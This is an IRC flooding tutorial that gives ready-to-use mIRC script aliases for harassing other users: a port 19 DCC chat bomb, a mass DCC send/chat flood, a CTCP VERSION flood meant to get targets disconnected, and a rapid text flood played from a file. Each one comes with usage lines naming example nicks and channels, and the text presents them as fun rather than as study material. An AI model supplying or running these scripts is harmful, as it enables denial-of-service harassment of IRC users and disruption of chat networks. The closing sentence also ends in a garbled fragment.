Flooding

Flooding may be fun but will probably get you /ignore'd,/kick'd, and/or /ban'd, possibly /kill'd or /klined'd if you are
enough of a nuisance. Use these floods at your own risk.



                                    Port 19 DCC Chat Bomb

How it works:
You send a message to the server to connect with the victim on port 19, the character generator port. If they accept the chat
they get a nice flood in there chat window sometimes locking up mIRC.
How do I do it?
You will need to find a servers longip, see The Scripters Corner, Although you can make a pop-up, I would suggest making an
Alias:

portbomb {
  raw -q PRIVMSG $$1 : $+ $chr(1) $+ DCC CHAT CHAT $$2 19 haha $+ $chr(1)
}

Usage:
/portbomb {nick/channel} {servers long ip}
/portbomb TiAMaT 3353362454
/portbomb #mIRCScripts 4593668594

                                        Mass Dcc Flood

The goal here is to fill up the victims screen with enough Dcc's that they'll be busy closing them for awhile or have to
disconnect. Here's an Alias:

dccbomb {
   .timer 20 2 /.timer 3 1 /chatsend $$1
}
chatsend {
   raw -q PRIVMSG $$1 : $+ $chr(1) $+ DCC SEND blah $+ $r(1,9) $+ $r(1,9) 3353362454 19 $r(1,9) $+ $r(1,9) $+ $chr(1)
   raw -q PRIVMSG $$1 : $+ $chr(1) $+ DCC CHAT CHAT 3353362454 19 lamer $+ $chr(1)
}

Usage:
/dccbomb {nick/channel}
/dccbomb bOnEz
If you don't get disconnected by the server for this whoever you sent it to will have a screen full of chat's and sends.

                                          Ctcp Floods

The only way to make Ctcp floods work is to make whoever you're flooding send enough through the server to get
disconnected. I like using version because you send 7 characters to the server and they send back alot more depending on
there client. If you want to version flood here's an Alias:

verflood {
  ignore -u60 $$1 3
  .timer 5 1 /.timer 10 1 /raw -q privmsg $$1 : $+ $chr(1) $+ VERSION
}

Usage:
/verflood {nick/channel}
/verflood _MiZeR_
Note: If you /verflood a channel you'll need to /ignore -u30 *!*@* so you don't get flooded with a whole bunch of version
replys. 

                                         Text Flooding

Although this really isn't a very effective way of killing people it can be fun if you find an opless channel and wanna scroll the
channel window.
One good flood in playing a wav file at 1 line per millisecond. This can be acoomplished using the /play command and a wav,
exe, or anyfile filled with machine code.

playflood {
   play $$1 c:\wavs\smallwav.wav 1
}

The one at the end makes it play at 1 line every millisecond, Be careful not to use to big of a file or you'll get disconnected.lt settings.